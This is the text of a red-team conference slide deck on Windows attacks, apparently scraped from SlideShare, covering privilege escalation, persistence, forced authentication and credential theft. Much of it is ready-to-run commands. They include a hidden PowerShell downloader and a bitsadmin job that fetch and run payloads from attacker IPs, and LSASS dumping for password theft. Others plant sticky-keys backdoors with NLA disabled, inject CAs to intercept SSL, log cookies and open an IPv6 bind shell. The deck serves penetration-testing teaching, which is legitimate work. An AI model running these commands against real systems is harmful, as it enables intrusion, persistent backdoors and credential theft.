SlideShare a Scribd company logo
1 of 78
Download to read offline
Attacks
AT is the new BLACK
About Me
mubix
NoVA Hackers Co-founder
Marine Corps
Hak5
Metasploit
Dad
Husband
About Me
cg
carnal0wnage
NoVA Hackers Co-founder
Lares
carnal0wnage.attackresearch.com
What we're gonna talk about
● Tricks/Misconfigurations as a user
● Escalation from admin-->system
● Persistence
● Forced Authentication
● Misc
Encyclopedia of Windows Privilege
Escalation
By Brett More Ruxcon 2012
http://www.docstoc.com/docs/112350262/Windows-Priv-Esc
http://www.youtube.com/watch?v=kMG8IsCohHA
This is an addition, lots of good info there that won’t necessarily be covered
here.
Exploits
Old Skewl Local Exploits
Taviso bug
sysret
etc
More and more are baked into frameworks and
run via their agent
- MSF, Canvas, Core Impact
*normally* not an issue but occasionally not
having a .exe to run is a bummer
Keyloggers
You have to be SYSTEM to get into winlogon
for the user.
BUT, every time i’ve keylogged (lately) they’ve
typed their domain creds into something i could
capture as a user.
Pocket Litter
Look For Creds On The Box
You might find creds on the box.
Examples
dir /s *pass*
dir /s *cred*
dir /s *vnc*
dir /s *.config
type C:sysprep.inf [clear]
type C:sysprepsysprep.xml [base64]
Is their truecrypt/PGP drive mapped?
Look For Creds On The Box
You might find creds on the box.
Examples
post/windows/gather/credentials/*
GPP
Group Policy Preference XML files include an
encrypted set of credentials (if credentials are
used), these are used for new users, making
shares, etc etc.
The encryption is
documented.
Free passwords!
Source: http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html
Original Source (down) : http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences
Key: http://msdn.microsoft.com/en-us/library/cc422924.aspx
Unattended Installs - Client
Unattended.xml is a file that is left on a system
after an unattended install, many times setting
the local administrator password
Usually found in:
%WINDIR%PantherUnattend
%WINDIR%Panther
http://rewtdance.blogspot.com/2012/11/windows-deployment-services-clear-text.html
Unattended Installs - Server
No authentication is needed to gather
Unattended.xml
Just need to find the "Windows Deployment
Services" server
auxiliary/scanner/dcerpc/windows_deployment
_services
Unattended Installs - Server
Windows Deployment Services aren’t the only
methods to do Unattended installs.
But the Unattend.xml is a standard.
Find it == Win
Unattended Installs - Server
http://technet.microsoft.com/en-
us/library/cc766271(v=ws.10).aspx
<LocalAccounts>
<LocalAccount wcm:action="add">
<Password>
<Value>cAB3AFAAYQBzAHMAdwBvAHIAZAA</Value>
<PlainText>false</PlainText>
</Password>
<Description>Test account</Description>
<DisplayName>Admin/Power User Account</DisplayName>
<Group>Administrators;Power Users</Group>
<Name>Test1</Name>
</LocalAccount>
cAB3AFAAYQBzAHMAdwBvAHIAZAA == pwPassword (‘pw‘ is the password)
Base64 encoded != PlainText ;-)
Configuration Failures
User Permissions
Domain User == Local Administrator on the host
Domain User == Power User on the host
http://blogs.technet.com/b/markrussinovich/archive/2006/05/01/the-power-in-power-users.aspx
All Domain Users == Local Admins on all hosts
Many Domain Groups = Local Admins on all hosts
Binpath Service Modify
accesschk.exe -uwcq * | findstr /v AUTHORITY
| findstr /v Administrators
(remember not all languages spell “Administrators” the same)
Binpath mod:
sc config badsrvc binpath= "net user bob /add"
type= interact
sc start badsrvc
sc stop badsrvc
Binpath Service Modify - Example
AlwaysInstallElevated
Setting used to allow standard users to install
MSI files without having to be admins.
HKLMSOFTWAREPoliciesMicrosoftWindows
InstallerAlwaysInstallElevated
HKCUSOFTWAREPoliciesMicrosoftWindow
sInstallerAlwaysInstallElevated
Missing Autoruns
C:sysinternals>autorunsc.exe -a | findstr /n /R "File not found"
131: File not found: C:Program Files (x86)BlueStacksHD-Service.exe
BstHdAndroidSvc Android
338: c:windowsmicrosoft.netframework64v3.0windows communication
foundationinfocard.exe
1248: File not found: C:Program Files (x86)BlueStacksHD-Hypervisor-
amd64.sys
2262: File not found: System32driverssynth3dvsc.sys
2326: File not found: system32driverstsusbhub.sys
2479: File not found: System32driversrdvgkmd.sys
Service Quoting - CVE-2000-1128
wmic service get name,displayname,pathname,
startmode |findstr /i "auto" |findstr /i /v "c:
windows" |findstr /i /v """
(XP requires admin access to use, Vista+ users
can run)
Non admin on XP, 1 by 1:
sc qc "NVIDIA Update Service Daemon"
Service Quoting (Manual)
sc query
Get list of services
sc qc skypeupdate
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: skypeupdate
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : "C:Program Files (x86)SkypeUpdaterUpdater.exe"
<--Not Vulnerable
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Skype Updater
DEPENDENCIES : RpcSs
SERVICE_START_NAME : LocalSystem
Service Quoting (Manual)
sc query
Get list of services
sc qc LENOVO.TPKNRSVC
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: LENOVO.TPKNRSVC
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:Program FilesLenovoCommunications
UtilityTPKNRSVC.exe <--Vulnerable
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Lenovo Keyboard Noise Reduction
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
Service Quoting
Example:
NVIDIA Update Service Daemon
C:Program Files (x86)NVIDIA CorporationNVIDIA Update Coredaemonu.exe
C:Program.exe
C:Program Files (x86)NVIDIA.exe
C:Program Files (x86)NVIDIA CorporationNVIDIA.exe
Lenovo Keyboard Noise Reduction
C:Program FilesLenovoCommunications UtilityTPKNRSVC.exe
C:Program.exe
C:Program FilesLenovoCommunications.exe
DLL Loading or Bad permissions
fxsst.dll - looks in C:Windows first, the where it
really is C:WindowsSystem32
Source: https://github.com/rapid7/metasploit-framework/pull/1103
Pentest Monkey Script to Check
pentest monkey’s priv check tool
Source: http://pentestmonkey.net/tools/windows-privesc-check
Admin -> SYSTEM
MSF getsystem
getsystem -t 1 :-)
requires meterpreter
work anywhere else? can do manually?
Sysinternals psexec
psexec -i -s -d cmd.exe
psexec: http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx
Binary Replacement
Replace binary called by a service with YOUR
binary
1. stop service
2. replace binary
3. start service
**Usually works for Power Users too**
Source: http://www.madhur.co.in/blog/2011/09/23/privilegeescalation.html
WMIC
wmic /node:DC1 /user:
DOMAINdomainadminsvc /password:
domainadminsvc123 process call create "cmd
/c vssadmin list shadows 2>&1 > C:
tempoutput.txt"
Source: http://www.room362.com/blog/2013/6/10/volume-shadow-copy-ntdsdit-domain-hashes-remotely-part1.
html
AT
at 13:20 /interactive cmd
net use targetserver /user:DOMuser pass
net time targetserver
at targetserver 13:20 C:tempevil.bat
Executes as SYSTEM
Must be an admin to do it
Easy way to check "whoami /groups" on Vista+
Debugging CMD.exe
Start the debugging:
at 13:37 C:debuggersremote.exe /s cmd SYSCMD
Connect to the debugger:
C:debuggersremote.exe /c 127.0.0.1 SYSCMD
NTSD can be used for this as well
Source: http://carnal0wnage.attackresearch.com/2013/07/admin-to-system-win7-with-remoteexe.html
NTSD: http://www.securityaegis.com/ntsd-backdoor/
schtasks
Wonderful new features!
1. Any user can create a task
2. I have new options other than "ONCE", like
ONIDLE, ONLOGON, and ONSTART
Scenario 1: ONIDLE run my C2 check-in binary
Scenario 2: ONLOGON run my cred dumper
bin
Scenario 3: ONSTART copy evil bin to random
location and start it.
Bypass UAC w/ Creds
UAC will not let local accounts authenticate
locally to elevate past UAC
Domain accounts have no such restriction.
Utilize Metasploit's PSEXEC + Domain account
that is an admin on the box you are on = No
UAC no more.
Source: http://mubix.github.io/blog/2013/08/11/psexec-uac-bypass-with-credentials/
Persistence
Passwords - best persistence
method
WCE and Mimikatz
wdigest (your AD password)
kerberos (your LM / NTLM hash)
ssp (your Outlook password)
livessp (your windows8 password)
msv (your AD password)
tspkg (your AD password)
WCE: http://www.ampliasecurity.com/research/wcefaq.html
Mimikatz: http://blog.gentilkiwi.com/mimikatz
Passwords through process
dumping
net use targetserver /user:DOMuser pass
copy procdump.exe targetserverc$
copy procdump.bat targetserverc$
procdump.exe -ma lsass %CNAME%.dmp
at targetserver 13:37 C:procdump.bat
copy targetserverc$targetserver.dmp .
game over...
Source: http://www.room362.com/blog/2013/6/7/using-mimikatz-alpha-or-getting-clear-text-passwords-with-a.
html
Ol’ Reliable
Put binary or .bat script in a startup folder
yeah shouldnt work, but it does…
Registry run keys
SETHC / UTILMAN
Replace %WINDIR%System32sethc.exe
Replace %WINDIR%System32utilman.exe
Hit SHIFT 5 times = sethc.exe run by SYSTEM
Win Key + U = utilman.exe run by SYSTEM
Files locked by Windows, must be done "offline"
If NLA (Network Layer Authentication) is enabled, won't work
If RDP is disabled, won't work
Source: http://carnal0wnage.attackresearch.com/2012/04/privilege-escalation-via-sticky-keys.html
SETHC / UTILMAN - NO REBOOT
HKLMSoftwareMicrosoftWindows
NTCurrentVersionImage File Execution
Options
make a key called "sethc.exe"
make a REG_SZ value called "Debugger"
(capitalized)
give it "calc.exe" as the value
Hit SHIFT 5 times.
Source: http://carnal0wnage.attackresearch.com/2012/04/privilege-escalation-via-sticky-keys.html
SETHC / UTILMAN - CONNECTIVITY
Enable RDP:
reg add
"HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTermin
al Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
Disable NLA:
reg add
"HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTermin
al ServerWinStationsRDP-Tcp" /v UserAuthentication /t
REG_DWORD /d 0 /f
Firewall exception for RDP:
netsh firewall set service type = remotedesktop mode = enable
Source: http://www.room362.com/blog/2012/5/25/sticky-keys-and-utilman-against-nla.html
Teredo IPv6 + Bindshell
netsh interface ipv6 install
netsh interface ipv6 teredo enterpriseclient
netsh interface ipv6 teredo set client teredo.
managemydedi.com
msfpayload windows/meterpreter/bind_ipv6_tcp
Create a loop that runs the payload, then pings
your IPv6 address, wait for user to take their
laptop home.
Source: http://www.room362.com/blog/2010/9/24/revenge-of-the-bind-shell.html
Rename on next reboot
HKLMSystemCurrentControlSetControlSessi
on ManagerPendingFileRenameOperations
Image from: http://education.aspu.ru/view.php?wnt=280
Exporting Wireless Configs
netsh wlan export profile key=clear
<sharedKey>
<keyType>passPhrase</keyType>
<protected>false</protected>
<keyMaterial>myPasswrd</keyMaterial>
</sharedKey>
Source: http://www.digininja.org/metasploit/getwlanprofiles.php
Powershell Downloader
Schedule this and it will execute the shellcode
on that page, pulling it each time (so you can
change as needed)
powershell.exe -w hidden -nop -ep bypass -c
"IEX ((new-object net.webclient).
downloadstring('http://192.168.172.1:
8080/myHbBywMxOSB'))"
Source: http://securitypadawan.blogspot.com/2013/07/authenticated-metasploit-payloads-via.html
BITSADMIN Downloader/Exec
bitsadmin /create mybackdoor
BITSADMIN version 3.0 [ 7.5.7601 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.
Created job {6C79ABFA-F7AA-4411-B74D-
B790666E130F}.
Source: https://isc.sans.edu/diary/Wipe+the+drive+Stealthy+Malware+Persistence+Mechanism+-+Part+1/15394
BITSADMIN Downloader/Exec
bitsadmin /addfile mybackdoor http://192.
168.222.150/myshell.exe C:
windowstempmyshell.exe
BITSADMIN version 3.0 [ 7.5.7601 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.
Added http://192.168.222.150/myshell.exe ->
C:windowstempmyshell.exe to job.
Source: https://isc.sans.edu/diary/Wipe+the+drive+Stealthy+Malware+Persistence+Mechanism+-+Part+1/15394
BITSADMIN Downloader/Exec
bitsadmin /SETMINRETRYDELAY mybackdoor 86400
BITSADMIN version 3.0 [ 7.5.7601 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.
Minimum retry delay set to 86400.
Source: https://isc.sans.edu/diary/Wipe+the+drive+Stealthy+Malware+Persistence+Mechanism+-+Part+1/15394
BITSADMIN Downloader/Exec
bitsadmin /SETNOTIFYCMDLINE mybackdoor C:
windowstempmyshell.exe NULL
BITSADMIN version 3.0 [ 7.5.7601 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.
notification command line set to 'C:
windowstempmyshell.exe' 'NULL'.
Source: https://isc.sans.edu/diary/Wipe+the+drive+Stealthy+Malware+Persistence+Mechanism+-+Part+1/15394
BITSADMIN Downloader/Exec
bitsadmin /getnotifycmdline mybackdoor
the notification command line is 'C:
windowstempmyshell.exe' 'NULL'
bitsadmin /listfiles mybackdoor
0 / UNKNOWN WORKING http://192.168.222.150
/myshell.exe -> C:windowstempmyshell.exe
bitsadmin /RESUME mybackdoor
Job resumed.
Source: https://isc.sans.edu/diary/Wipe+the+drive+Stealthy+Malware+Persistence+Mechanism+-+Part+1/15394
Password Filters (requires reboot)
Dump DLL in %WINDIR%System32
Update:
HKLMSYSTEMCurrentControlSetControlLsa
Notification Packages
Sit and wait for clear text passwords as defined
functionality by Microsoft:
http://msdn.microsoft.com/en-
us/library/windows/desktop/ms721882(v=vs.
Password Filters hooking, no reboot
Reflective DLL injection w/ Powershell (in-
memory) hooking.
SSPI (requires reboot)
Kiwissp.dll
1. compile
2. drop in system32
3. “Security Packages”
registry key
4. wait for passwords
Command Line PPTP Tunnel
post/windows/manage/pptp_tunnel
Create a PPTP tunnel between victim and
attacker.
Microsoft intentionally created PPTP to be
resilient to network drops and changes.
Source: http://www.shelliscoming.com/2013/06/metasploit-man-in-middle-through-pptp.html
Just uninstall a patch
Not recommended for clients, but if you need
back on a system, make it vulnerable.
Forced Authentication
lmhosts
192.168.92.123 evil #PRE
#BEGIN_ALTERNATE
#INCLUDE evilshare1test.txt
#END_ALTERNATE
LNK (Shortcuts) with UNC icons
Create a shortcut to
anything (cmd.exe)
Go to Properties ->
Change Icon and give it a
UNC path.
Source http://www.room362.com/blog/2012/2/11/ms08_068-ms10_046-fun-until-2018.html
Auth and Persistence
Anyone see what I did?
Source: http://carnal0wnage.attackresearch.com/2013/09/finding-executable-hijacking.html
Used in conjunction with this
REG key can be devastating:
HKLMSYSTEM
CurrentControlSetControl
Session Manager
CWDIllegalInDllSearch = 0
Misc
WinRM
Windows Remote Management - includes
WinRS (Windows Remote Shell)
Listens on 5985/5986 by default, allows
interactive shell access over HTTP. Old
versions and those installed with IIS are on 80
Found by asking servers for /wsman and
recording 402s
Injecting CAs
post/windows/manage/inject_ca & remove_ca
Throws a CA on a system, code signing, web,
etc.
Can be used to bypass application whitelisting
(if "signed-good" binaries are allowed)
Also can allow you to proxy all SSL traffic for a
user, without any warnings to them.
vt ( Nick Freeman @ Security-Assessment.com )
WPAD, WPADWPADWPAD & LLMNR
Auto detects proxy
Looks for WPAD
IPv6 version (LLMNR)
Looks for
WPADWPADWPAD
You get to set their
proxy information ;-)
PORTPROXY
Basically port forwarding built into Windows
Firewall. Modes:
v4tov4
v4tov6
v6tov4
v6tov6
Oh yea…
Plus if you’re lazy (there is a module for that):
post/windows/manage/portproxy
Abusing PORTPROXY
LNK UNC attack to a share that doesn't exist
Windows will auto-try WebDAV
PORTPROXY on 80 out over IPv6/teredo
Since Windows is connecting "internally" the
hosts will auto-authenticate
.. Invisible
Stealing SSL Cookies
logman start LogCookies -p Microsoft-Windows-WinInet -o
logcookies.etl -ets
wevtutil qe logcookies.etl /lf:true /f:Text | find /i "cookie
added"
wevtutil qe logcookies.etl /lf:true /f:Text | find /i "POST"
logman stop LogCookies -ets
Mark Baggett
Source: http://pauldotcom.com/2012/07/post-exploitation-recon-with-e.html
Breaking NetNTLMv1
http://markgamache.blogspot.
com/2013/01/ntlm-challenge-response-is-100-
broken.html
PoC turns NetNTLMv1 into this format:
$99$ASNFZ4mrze8lqYwcMegYR0ZrKbLfRoDz2Ag=
Cloudcrack.com will turn that into straight
NTLM in 23 hours.
DEP Exclusions
DEP OptOut can be annoying and stop binaries
from running.
Adding your binary to:
HKLMSoftwareMicrosoftWindows
NTCurrentVersionAppCompatFlagLayers with the value
"DisableNXShowUI". Doesn’t work
This does:
rundll32 sysdm.cpl, NoExecuteAddFileOptOutList "C:
tempevil.exe"
Source: http://hackingnotes.com/post/add-executable-to-dep-exclusion-from-the-command-line
Zone Transfer via AD
Domain Admin can run this (powershell):
PS C:Usersjdoe> get-wmiobject -
ComputerName dc1 -Namespace
rootmicrosoftDNS - Class
MicrosoftDNS_ResourceRecord -Filter
"domainname='projectmentor.net'" | select
textrepresentation
Source: http://marcusoh.blogspot.com/2012/06/enumerating-dns-records-with-powershell.html
Zone Transfer via AD
Zone Transfer via AD
Users can run this (powershell):
● PS C:Usersjdoe> dns-dump.ps1 -zone projectmentor.
net -dc dc1
● C:> powershell -ep bypass -f dnsdump.ps1 -zone
projectmentor.net -dc dc1
Code: https://github.
com/mmessano/PowerShell/blob/master/dns-
dump.ps1
Source: http://www.indented.co.uk/index.php/2009/06/18/mapping-the-dnsrecord-attribute/
END
@mubix @carnal0wnage
Mubix “Rob” Fuller
mubix@hak5.org
Chris Gates
chris@carnal0wnage.com
Abstract
A follow on to the Encyclopaedia Of Windows
Privilege Escalation published by InsomniaSec
at Ruxcon 2011, this talk is aimed at detailing
not just escalation from user to admin and
admin to system, but persistence and forced
authentication as well as a few other treats.
Mubix Bio
Mubix is a Senior Red Teamer. His
professional experience starts from his time on
active duty as United States Marine. He has
worked with devices and software that run
gambit in the security realm. He has a few
certifications, but the titles that he holds above
the rest is FATHER, HUSBAND and United
States Marine.
CG Bio
Chris Gates: Chris joined LARES in 2011 as a Partner &
Principal Security Consultant. Chris has extensive
experience in network and web application penetration
testing as well as other Information Operations experience
working as an operator for a DoD Red Team and other Full
Scope penetration testing teams (regular pentesting teams
too). Chris holds a BS in Computer Science and Geospatial
Information Science from the United States Military
Academy at West Point and holds his… redacted…no one
cares anyway. In the past, he has spoken at the United
States Military Academy, BlackHat, DefCon, DerbyCon,
Toorcon, Brucon, Troopers, SOURCE Boston, OWASP
AppSec DC, ChicagoCon, NotaCon, and CSI. He is a
regular blogger carnal0wnage.attackresearch.com

More Related Content

What's hot

Carlos García - Pentesting Active Directory Forests [rooted2019]
Carlos García - Pentesting Active Directory Forests [rooted2019]Carlos García - Pentesting Active Directory Forests [rooted2019]
Carlos García - Pentesting Active Directory Forests [rooted2019]RootedCON
 
OWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesOWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesChristopher Frohoff
 
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...DirkjanMollema
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Rob Fuller
 
aclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHoundaclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHoundDirkjanMollema
 
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone  Sector...Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone  Sector...
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...Chris Gates
 
Building secure applications with keycloak
Building secure applications with keycloak Building secure applications with keycloak
Building secure applications with keycloak Abhishek Koserwal
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesMikhail Egorov
 
Hunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentHunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentTeymur Kheirkhabarov
 
Building Better Backdoors with WMI - DerbyCon 2017
Building Better Backdoors with WMI - DerbyCon 2017Building Better Backdoors with WMI - DerbyCon 2017
Building Better Backdoors with WMI - DerbyCon 2017Alexander Polce Leary
 
OK Google, How Do I Red Team GSuite?
OK Google, How Do I Red Team GSuite?OK Google, How Do I Red Team GSuite?
OK Google, How Do I Red Team GSuite?Beau Bullock
 
ReCertifying Active Directory
ReCertifying Active DirectoryReCertifying Active Directory
ReCertifying Active DirectoryWill Schroeder
 
What should a hacker know about WebDav?
What should a hacker know about WebDav?What should a hacker know about WebDav?
What should a hacker know about WebDav?Mikhail Egorov
 
Derbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryWill Schroeder
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing TechniquesAvinash Thapa
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureSergey Soldatov
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 
An ACE in the Hole - Stealthy Host Persistence via Security Descriptors
An ACE in the Hole - Stealthy Host Persistence via Security DescriptorsAn ACE in the Hole - Stealthy Host Persistence via Security Descriptors
An ACE in the Hole - Stealthy Host Persistence via Security DescriptorsWill Schroeder
 

What's hot (20)

Carlos García - Pentesting Active Directory Forests [rooted2019]
Carlos García - Pentesting Active Directory Forests [rooted2019]Carlos García - Pentesting Active Directory Forests [rooted2019]
Carlos García - Pentesting Active Directory Forests [rooted2019]
 
OWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesOWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling Pickles
 
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
 
aclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHoundaclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHound
 
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone  Sector...Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone  Sector...
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...
 
Building secure applications with keycloak
Building secure applications with keycloak Building secure applications with keycloak
Building secure applications with keycloak
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sites
 
Hunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentHunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows Environment
 
Building Better Backdoors with WMI - DerbyCon 2017
Building Better Backdoors with WMI - DerbyCon 2017Building Better Backdoors with WMI - DerbyCon 2017
Building Better Backdoors with WMI - DerbyCon 2017
 
OK Google, How Do I Red Team GSuite?
OK Google, How Do I Red Team GSuite?OK Google, How Do I Red Team GSuite?
OK Google, How Do I Red Team GSuite?
 
ReCertifying Active Directory
ReCertifying Active DirectoryReCertifying Active Directory
ReCertifying Active Directory
 
What should a hacker know about WebDav?
What should a hacker know about WebDav?What should a hacker know about WebDav?
What should a hacker know about WebDav?
 
Derbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active Directory
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing Techniques
 
Unsecuring SSH
Unsecuring SSHUnsecuring SSH
Unsecuring SSH
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows Infrastructure
 
How fun of privilege escalation Red Pill2017
How fun of privilege escalation  Red Pill2017How fun of privilege escalation  Red Pill2017
How fun of privilege escalation Red Pill2017
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protection
 
An ACE in the Hole - Stealthy Host Persistence via Security Descriptors
An ACE in the Hole - Stealthy Host Persistence via Security DescriptorsAn ACE in the Hole - Stealthy Host Persistence via Security Descriptors
An ACE in the Hole - Stealthy Host Persistence via Security Descriptors
 

Similar to Windows Attacks AT is the new black

SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012
SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012
SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012Scott Sutherland
 
Docker Security workshop slides
Docker Security workshop slidesDocker Security workshop slides
Docker Security workshop slidesDocker, Inc.
 
SAP strikes back Your SAP server now counter attacks.
SAP strikes back Your SAP server now counter attacks.SAP strikes back Your SAP server now counter attacks.
SAP strikes back Your SAP server now counter attacks.Dmitry Iudin
 
(ARC402) Deployment Automation: From Developers' Keyboards to End Users' Scre...
(ARC402) Deployment Automation: From Developers' Keyboards to End Users' Scre...(ARC402) Deployment Automation: From Developers' Keyboards to End Users' Scre...
(ARC402) Deployment Automation: From Developers' Keyboards to End Users' Scre...Amazon Web Services
 
[文件] 華創造型SERVER安裝過程記錄 -V6R2016X 安裝流程
[文件] 華創造型SERVER安裝過程記錄 -V6R2016X 安裝流程[文件] 華創造型SERVER安裝過程記錄 -V6R2016X 安裝流程
[文件] 華創造型SERVER安裝過程記錄 -V6R2016X 安裝流程Jimmy Chang
 
Harmonious Development: Via Vagrant and Puppet
Harmonious Development: Via Vagrant and PuppetHarmonious Development: Via Vagrant and Puppet
Harmonious Development: Via Vagrant and PuppetAchieve Internet
 
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...CODE BLUE
 
Free tools for win server administration
Free tools for win server administrationFree tools for win server administration
Free tools for win server administrationConcentrated Technology
 
Windows guest debugging presentation from KVM Forum 2012
Windows guest debugging presentation from KVM Forum 2012Windows guest debugging presentation from KVM Forum 2012
Windows guest debugging presentation from KVM Forum 2012Yan Vugenfirer
 
Powervc upgrade from_1.3.0.2_to_1.3.2.0
Powervc upgrade from_1.3.0.2_to_1.3.2.0Powervc upgrade from_1.3.0.2_to_1.3.2.0
Powervc upgrade from_1.3.0.2_to_1.3.2.0Gobinath Panchavarnam
 
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web InterfacesThey Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfacesmichelemanzotti
 
introduction-infra-as-a-code using terraform
introduction-infra-as-a-code using terraformintroduction-infra-as-a-code using terraform
introduction-infra-as-a-code using terraformniyof97
 
The How and Why of Windows containers
The How and Why of Windows containersThe How and Why of Windows containers
The How and Why of Windows containersBen Hall
 
Moving a Windows environment to the cloud - DevOps Galway Meetup
Moving a Windows environment to the cloud - DevOps Galway MeetupMoving a Windows environment to the cloud - DevOps Galway Meetup
Moving a Windows environment to the cloud - DevOps Galway MeetupGiulio Vian
 
Null bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web ApplicationNull bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web ApplicationAnant Shrivastava
 
Cloud adoption fails - 5 ways deployments go wrong and 5 solutions
Cloud adoption fails - 5 ways deployments go wrong and 5 solutionsCloud adoption fails - 5 ways deployments go wrong and 5 solutions
Cloud adoption fails - 5 ways deployments go wrong and 5 solutionsYevgeniy Brikman
 
Modern tooling to assist with developing applications on FreeBSD
Modern tooling to assist with developing applications on FreeBSDModern tooling to assist with developing applications on FreeBSD
Modern tooling to assist with developing applications on FreeBSDSean Chittenden
 

Similar to Windows Attacks AT is the new black (20)

SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012
SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012
SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012
 
Docker Security workshop slides
Docker Security workshop slidesDocker Security workshop slides
Docker Security workshop slides
 
SAP strikes back Your SAP server now counter attacks.
SAP strikes back Your SAP server now counter attacks.SAP strikes back Your SAP server now counter attacks.
SAP strikes back Your SAP server now counter attacks.
 
(ARC402) Deployment Automation: From Developers' Keyboards to End Users' Scre...
(ARC402) Deployment Automation: From Developers' Keyboards to End Users' Scre...(ARC402) Deployment Automation: From Developers' Keyboards to End Users' Scre...
(ARC402) Deployment Automation: From Developers' Keyboards to End Users' Scre...
 
[文件] 華創造型SERVER安裝過程記錄 -V6R2016X 安裝流程
[文件] 華創造型SERVER安裝過程記錄 -V6R2016X 安裝流程[文件] 華創造型SERVER安裝過程記錄 -V6R2016X 安裝流程
